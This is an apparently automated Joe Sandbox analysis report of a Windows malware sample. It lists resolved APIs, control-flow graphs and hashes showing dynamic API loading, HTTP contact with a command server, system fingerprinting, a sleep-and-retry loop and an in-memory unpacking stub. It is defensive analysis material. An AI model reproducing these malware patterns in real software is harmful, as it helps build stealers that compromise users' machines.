                                                  • GetProcAddress.KERNEL32(77190000,00869E10), ref: 00419F81
                                                  • GetProcAddress.KERNEL32(77190000,00838738), ref: 00419F99
                                                  • GetProcAddress.KERNEL32(77190000,00869E58), ref: 00419FB1
                                                  • GetProcAddress.KERNEL32(77190000,00838758), ref: 00419FCA
                                                  • GetProcAddress.KERNEL32(77190000,0086A050), ref: 00419FE2
                                                  • GetProcAddress.KERNEL32(77190000,00869D80), ref: 00419FFA
                                                  • GetProcAddress.KERNEL32(77190000,00838778), ref: 0041A013
                                                  • GetProcAddress.KERNEL32(77190000,00838798), ref: 0041A02B
                                                  • LoadLibraryA.KERNEL32(00869F90,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A03D
                                                  • LoadLibraryA.KERNEL32(00869DF8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A04E
                                                  • LoadLibraryA.KERNEL32(00869E40,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A060
                                                  • LoadLibraryA.KERNEL32(00869E88,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A072
                                                  • LoadLibraryA.KERNEL32(00869E28,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A083
                                                  • LoadLibraryA.KERNEL32(00869FA8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A095
                                                  • LoadLibraryA.KERNEL32(00869F00,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0A7
                                                  • LoadLibraryA.KERNEL32(00869FC0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0B8
                                                  • GetProcAddress.KERNEL32(77040000,008383F8), ref: 0041A0DA
                                                  • GetProcAddress.KERNEL32(77040000,00869EB8), ref: 0041A0F2
                                                  • GetProcAddress.KERNEL32(77040000,00867120), ref: 0041A10A
                                                  • GetProcAddress.KERNEL32(77040000,00869ED0), ref: 0041A123
                                                  • GetProcAddress.KERNEL32(77040000,008380B8), ref: 0041A13B
                                                  • GetProcAddress.KERNEL32(704D0000,00836610), ref: 0041A160
                                                  • GetProcAddress.KERNEL32(704D0000,008382B8), ref: 0041A179
                                                  • GetProcAddress.KERNEL32(704D0000,00836638), ref: 0041A191
                                                  • GetProcAddress.KERNEL32(704D0000,00869F18), ref: 0041A1A9
                                                  • GetProcAddress.KERNEL32(704D0000,00869D98), ref: 0041A1C2
                                                  • GetProcAddress.KERNEL32(704D0000,00837FF8), ref: 0041A1DA
                                                  • GetProcAddress.KERNEL32(704D0000,008383B8), ref: 0041A1F2
                                                  • GetProcAddress.KERNEL32(704D0000,00869DC8), ref: 0041A20B
                                                  • GetProcAddress.KERNEL32(768D0000,008383D8), ref: 0041A22C
                                                  • GetProcAddress.KERNEL32(768D0000,008382F8), ref: 0041A244
                                                  • GetProcAddress.KERNEL32(768D0000,00869F30), ref: 0041A25D
                                                  • GetProcAddress.KERNEL32(768D0000,00869DE0), ref: 0041A275
                                                  • GetProcAddress.KERNEL32(768D0000,008381F8), ref: 0041A28D
                                                  • GetProcAddress.KERNEL32(75790000,008363E0), ref: 0041A2B3
                                                  • GetProcAddress.KERNEL32(75790000,008366D8), ref: 0041A2CB
                                                  • GetProcAddress.KERNEL32(75790000,00869F48), ref: 0041A2E3
                                                  • GetProcAddress.KERNEL32(75790000,008381D8), ref: 0041A2FC
                                                  • GetProcAddress.KERNEL32(75790000,00838198), ref: 0041A314
                                                  • GetProcAddress.KERNEL32(75790000,00836598), ref: 0041A32C
                                                  • GetProcAddress.KERNEL32(75A10000,00869F60), ref: 0041A352
                                                  • GetProcAddress.KERNEL32(75A10000,00838018), ref: 0041A36A
                                                  • GetProcAddress.KERNEL32(75A10000,00867150), ref: 0041A382
                                                  • GetProcAddress.KERNEL32(75A10000,00869F78), ref: 0041A39B
                                                  • GetProcAddress.KERNEL32(75A10000,00869FD8), ref: 0041A3B3
                                                  • GetProcAddress.KERNEL32(75A10000,00838278), ref: 0041A3CB
                                                  • GetProcAddress.KERNEL32(75A10000,00838218), ref: 0041A3E4
                                                  • GetProcAddress.KERNEL32(75A10000,0086A008), ref: 0041A3FC
                                                  • GetProcAddress.KERNEL32(75A10000,0086A020), ref: 0041A414
                                                  • GetProcAddress.KERNEL32(76850000,00838238), ref: 0041A436
                                                  • GetProcAddress.KERNEL32(76850000,0086A038), ref: 0041A44E
                                                  • GetProcAddress.KERNEL32(76850000,00869D68), ref: 0041A466
                                                  • GetProcAddress.KERNEL32(76850000,0086A260), ref: 0041A47F
                                                  • GetProcAddress.KERNEL32(76850000,0086A1D0), ref: 0041A497
                                                  • GetProcAddress.KERNEL32(75690000,00838258), ref: 0041A4B8
                                                  • GetProcAddress.KERNEL32(75690000,008380D8), ref: 0041A4D1
                                                  • GetProcAddress.KERNEL32(769C0000,008380F8), ref: 0041A4F2
                                                  • GetProcAddress.KERNEL32(769C0000,0086A278), ref: 0041A50A
                                                  • GetProcAddress.KERNEL32(6F8C0000,00838158), ref: 0041A530
                                                  • GetProcAddress.KERNEL32(6F8C0000,00838038), ref: 0041A548
                                                  • GetProcAddress.KERNEL32(6F8C0000,00838058), ref: 0041A560
                                                  • GetProcAddress.KERNEL32(6F8C0000,0086A188), ref: 0041A579
                                                  • GetProcAddress.KERNEL32(6F8C0000,00838298), ref: 0041A591
                                                  • GetProcAddress.KERNEL32(6F8C0000,008382D8), ref: 0041A5A9
                                                  • GetProcAddress.KERNEL32(6F8C0000,00838118), ref: 0041A5C2
                                                  • GetProcAddress.KERNEL32(6F8C0000,00838138), ref: 0041A5DA
                                                  • GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 0041A5F1
                                                  • GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 0041A607
                                                  • GetProcAddress.KERNEL32(75D90000,0086A290), ref: 0041A629
                                                  • GetProcAddress.KERNEL32(75D90000,00867130), ref: 0041A641
                                                  • GetProcAddress.KERNEL32(75D90000,0086A398), ref: 0041A659
                                                  • GetProcAddress.KERNEL32(75D90000,0086A2F0), ref: 0041A672
                                                  • GetProcAddress.KERNEL32(76470000,00838318), ref: 0041A693
                                                  • GetProcAddress.KERNEL32(70300000,0086A3B0), ref: 0041A6B4
                                                  • GetProcAddress.KERNEL32(70300000,00838178), ref: 0041A6CD
                                                  • GetProcAddress.KERNEL32(70300000,0086A248), ref: 0041A6E5
                                                  • GetProcAddress.KERNEL32(70300000,0086A2A8), ref: 0041A6FD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoad
                                                  • String ID: HttpQueryInfoA$InternetSetOptionA
                                                  • API String ID: 2238633743-1775429166
                                                  • Opcode ID: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                                  • Instruction ID: b148544ec257a615b167952e2e9b89b3667e8f5620887ecf26b211dda149ff7d
                                                  • Opcode Fuzzy Hash: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                                  • Instruction Fuzzy Hash: 02621DBD5C0200BFD364DFE8EE889A63BFBF74E701714A61AE609C3264D6399441DB52

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1001 406280-40630b call 41a7a0 call 4047b0 call 41a740 InternetOpenA StrCmpCA 1008 406314-406318 1001->1008 1009 40630d 1001->1009 1010 406509-406525 call 41a7a0 call 41a800 * 2 1008->1010 1011 40631e-406342 InternetConnectA 1008->1011 1009->1008 1029 406528-40652d 1010->1029 1012 406348-40634c 1011->1012 1013 4064ff-406503 InternetCloseHandle 1011->1013 1015 40635a 1012->1015 1016 40634e-406358 1012->1016 1013->1010 1018 406364-406392 HttpOpenRequestA 1015->1018 1016->1018 1020 4064f5-4064f9 InternetCloseHandle 1018->1020 1021 406398-40639c 1018->1021 1020->1013 1023 4063c5-406405 HttpSendRequestA HttpQueryInfoA 1021->1023 1024 40639e-4063bf InternetSetOptionA 1021->1024 1026 406407-406427 call 41a740 call 41a800 * 2 1023->1026 1027 40642c-40644b call 418940 1023->1027 1024->1023 1026->1029 1034 4064c9-4064e9 call 41a740 call 41a800 * 2 1027->1034 1035 40644d-406454 1027->1035 1034->1029 1038 406456-406480 InternetReadFile 1035->1038 1039 4064c7-4064ef InternetCloseHandle 1035->1039 1042 406482-406489 1038->1042 1043 40648b 1038->1043 1039->1020 1042->1043 1047 40648d-4064c5 call 41a9b0 call 41a8a0 call 41a800 1042->1047 1043->1039 1047->1038
                                                  APIs
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                    • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                    • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                  • StrCmpCA.SHLWAPI(?,0086C060), ref: 00406303
                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                  • HttpOpenRequestA.WININET(00000000,GET,?,0086B718,00000000,00000000,00400100,00000000), ref: 00406385
                                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004063FD
                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
                                                  • InternetCloseHandle.WININET(00000000), ref: 004064EF
                                                  • InternetCloseHandle.WININET(00000000), ref: 004064F9
                                                  • InternetCloseHandle.WININET(00000000), ref: 00406503
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                  • String ID: ERROR$ERROR$GET
                                                  • API String ID: 3074848878-2509457195
                                                  • Opcode ID: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
                                                  • Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
                                                  • Opcode Fuzzy Hash: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
                                                  • Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1058 4117a0-4117cd call 41aad0 StrCmpCA 1061 4117d7-4117f1 call 41aad0 strtok_s 1058->1061 1062 4117cf-4117d1 ExitProcess 1058->1062 1065 4117f4-4117f8 1061->1065 1066 4119c2-4119cd call 41a800 1065->1066 1067 4117fe-411811 1065->1067 1069 411817-41181a 1067->1069 1070 41199e-4119bd strtok_s 1067->1070 1072 411821-411830 call 41a820 1069->1072 1073 411849-411858 call 41a820 1069->1073 1074 4118ad-4118be StrCmpCA 1069->1074 1075 4118cf-4118e0 StrCmpCA 1069->1075 1076 41198f-411999 call 41a820 1069->1076 1077 4118f1-411902 StrCmpCA 1069->1077 1078 411951-411962 StrCmpCA 1069->1078 1079 411970-411981 StrCmpCA 1069->1079 1080 411913-411924 StrCmpCA 1069->1080 1081 411932-411943 StrCmpCA 1069->1081 1082 411835-411844 call 41a820 1069->1082 1083 41185d-41186e StrCmpCA 1069->1083 1084 41187f-411890 StrCmpCA 1069->1084 1070->1065 1072->1070 1073->1070 1094 4118c0-4118c3 1074->1094 1095 4118ca 1074->1095 1096 4118e2-4118e5 1075->1096 1097 4118ec 1075->1097 1076->1070 1098 411904-411907 1077->1098 1099 41190e 1077->1099 1104 411964-411967 1078->1104 1105 41196e 1078->1105 1085 411983-411986 1079->1085 1086 41198d 1079->1086 1100 411930 1080->1100 1101 411926-411929 1080->1101 1102 411945-411948 1081->1102 1103 41194f 1081->1103 1082->1070 1090 411870-411873 1083->1090 1091 41187a 1083->1091 1092 411892-41189c 1084->1092 1093 41189e-4118a1 1084->1093 1085->1086 1086->1070 1090->1091 1091->1070 1110 4118a8 1092->1110 1093->1110 1094->1095 1095->1070 1096->1097 1097->1070 1098->1099 1099->1070 1100->1070 1101->1100 1102->1103 1103->1070 1104->1105 1105->1070 1110->1070
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitProcessstrtok_s
                                                  • String ID: block
                                                  • API String ID: 3407564107-2199623458
                                                  • Opcode ID: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                                                  • Instruction ID: 00bb13bb87ecd4f31d5cbb7361e66ee12f2c4d363b15aa8138e6c51e0cba8311
                                                  • Opcode Fuzzy Hash: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                                                  • Instruction Fuzzy Hash: AC517DB4A10209EFCB04DFA1D954BFE77B6BF44304F10804AE516A7361D778E992CB6A

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1111 415510-415577 call 415ad0 call 41a820 * 3 call 41a740 * 4 1127 41557c-415583 1111->1127 1128 415585-4155b6 call 41a820 call 41a7a0 call 401590 call 4151f0 1127->1128 1129 4155d7-41564c call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1127->1129 1145 4155bb-4155d2 call 41a8a0 call 41a800 1128->1145 1155 415693-4156a9 call 41aad0 StrCmpCA 1129->1155 1159 41564e-41568e call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1129->1159 1145->1155 1160 4157dc-415844 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1155->1160 1161 4156af-4156b6 1155->1161 1159->1155 1291 415ac3-415ac6 1160->1291 1164 4157da-41585f call 41aad0 StrCmpCA 1161->1164 1165 4156bc-4156c3 1161->1165 1183 415991-4159f9 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1164->1183 1184 415865-41586c 1164->1184 1168 4156c5-415719 call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1165->1168 1169 41571e-415793 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1165->1169 1168->1164 1169->1164 1270 415795-4157d5 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1169->1270 1183->1291 1191 415872-415879 1184->1191 1192 41598f-415a14 call 41aad0 StrCmpCA 1184->1192 1199 4158d3-415948 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1191->1199 1200 41587b-4158ce call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1191->1200 1220 415a16-415a21 Sleep 1192->1220 1221 415a28-415a91 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1192->1221 1199->1192 1296 41594a-41598a call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1199->1296 1200->1192 1220->1127 1221->1291 1270->1164 1296->1192
                                                  APIs
                                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00867190,?,0042110C,?,00000000), ref: 0041A82B
                                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415644
                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004156A1
                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415857
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 004151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 004152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                                    • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 0041532F
                                                    • Part of subcall function 004152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                                    • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 00415383
                                                    • Part of subcall function 004152C0: strtok.MSVCRT(00000000,?), ref: 0041539E
                                                    • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 004153AE
                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041578B
                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415940
                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415A0C
                                                  • Sleep.KERNEL32(0000EA60), ref: 00415A1B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpylstrlen$Sleepstrtok
                                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                  • API String ID: 3630751533-2791005934
                                                  • Opcode ID: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                                                  • Instruction ID: 0baa471f6470c30cedeccf0ca5f41b7a1b3666a88d5ff2061c329f06e4daefd3
                                                  • Opcode Fuzzy Hash: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                                                  • Instruction Fuzzy Hash: 5BE18675910104AACB04FBB1DD52EED733DAF54314F50812EB406660D1EF3CAB9ACBAA

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1322 417500-41754a GetWindowsDirectoryA 1323 417553-4175c7 GetVolumeInformationA call 418d00 * 3 1322->1323 1324 41754c 1322->1324 1331 4175d8-4175df 1323->1331 1324->1323 1332 4175e1-4175fa call 418d00 1331->1332 1333 4175fc-417617 GetProcessHeap HeapAlloc 1331->1333 1332->1331 1335 417619-417626 call 41a740 1333->1335 1336 417628-417658 wsprintfA call 41a740 1333->1336 1343 41767e-41768e 1335->1343 1336->1343
                                                  APIs
                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00417542
                                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417603
                                                  • HeapAlloc.KERNEL32(00000000), ref: 0041760A
                                                  • wsprintfA.USER32 ref: 00417640
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                  • String ID: :$C$\
                                                  • API String ID: 3790021787-3809124531
                                                  • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                  • Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
                                                  • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                  • Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1344 b2003c-b20047 1345 b20049 1344->1345 1346 b2004c-b20263 call b20a3f call b20e0f call b20d90 VirtualAlloc 1344->1346 1345->1346 1361 b20265-b20289 call b20a69 1346->1361 1362 b2028b-b20292 1346->1362 1367 b202ce-b203c2 VirtualProtect call b20cce call b20ce7 1361->1367 1364 b202a1-b202b0 1362->1364 1366 b202b2-b202cc 1364->1366 1364->1367 1366->1364 1373 b203d1-b203e0 1367->1373 1374 b203e2-b20437 call b20ce7 1373->1374 1375 b20439-b204b8 VirtualFree 1373->1375 1374->1373 1377 b205f4-b205fe 1375->1377 1378 b204be-b204cd 1375->1378 1381 b20604-b2060d 1377->1381 1382 b2077f-b20789 1377->1382 1380 b204d3-b204dd 1378->1380 1380->1377 1384 b204e3-b20505 1380->1384 1381->1382 1387 b20613-b20637 1381->1387 1385 b207a6-b207b0 1382->1385 1386 b2078b-b207a3 1382->1386 1395 b20517-b20520 1384->1395 1396 b20507-b20515 1384->1396 1388 b207b6-b207cb 1385->1388 1389 b2086e-b208be LoadLibraryA 1385->1389 1386->1385 1390 b2063e-b20648 1387->1390 1392 b207d2-b207d5 1388->1392 1394 b208c7-b208f9 1389->1394 1390->1382 1393 b2064e-b2065a 1390->1393 1397 b207d7-b207e0 1392->1397 1398 b20824-b20833 1392->1398 1393->1382 1399 b20660-b2066a 1393->1399 1400 b20902-b2091d 1394->1400 1401 b208fb-b20901 1394->1401 1402 b20526-b20547 1395->1402 1396->1402 1403 b207e2 1397->1403 1404 b207e4-b20822 1397->1404 1406 b20839-b2083c 1398->1406 1405 b2067a-b20689 1399->1405 1401->1400 1410 b2054d-b20550 1402->1410 1403->1398 1404->1392 1407 b20750-b2077a 1405->1407 1408 b2068f-b206b2 1405->1408 1406->1389 1409 b2083e-b20847 1406->1409 1407->1390 1411 b206b4-b206ed 1408->1411 1412 b206ef-b206fc 1408->1412 1413 b2084b-b2086c 1409->1413 1414 b20849 1409->1414 1416 b205e0-b205ef 1410->1416 1417 b20556-b2056b 1410->1417 1411->1412 1418 b2074b 1412->1418 1419 b206fe-b20748 1412->1419 1413->1406 1414->1389 1416->1380 1420 b2056f-b2057a 1417->1420 1421 b2056d 1417->1421 1418->1405 1419->1418 1422 b2059b-b205bb 1420->1422 1423 b2057c-b20599 1420->1423 1421->1416 1428 b205bd-b205db 1422->1428 1423->1428 1428->1410
                                                  APIs
                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00B2024D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID: cess$kernel32.dll
                                                  • API String ID: 4275171209-1230238691
                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                  • Instruction ID: b9ac43faf0e425f66e751f636274e19294a2a96a06a7e17410e8e14007054894
                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                  • Instruction Fuzzy Hash: 72527974A11229DFDB64CF58D984BA8BBB1BF09304F1480D9E90DAB352DB30AE85DF14

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(77190000,00839EF0), ref: 004198A1
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(77190000,00839F08), ref: 004198BA
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(77190000,00839F20), ref: 004198D2
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(77190000,00839F38), ref: 004198EA
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(77190000,00866C70), ref: 00419903
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(77190000,008670F0), ref: 0041991B
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(77190000,00838458), ref: 00419933
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(77190000,008386B8), ref: 0041994C
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(77190000,00866D60), ref: 00419964
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(77190000,00866CA0), ref: 0041997C
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(77190000,00866CD0), ref: 00419995
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(77190000,00866CE8), ref: 004199AD
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(77190000,00838438), ref: 004199C5
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(77190000,00866A78), ref: 004199DE
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                                                    • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
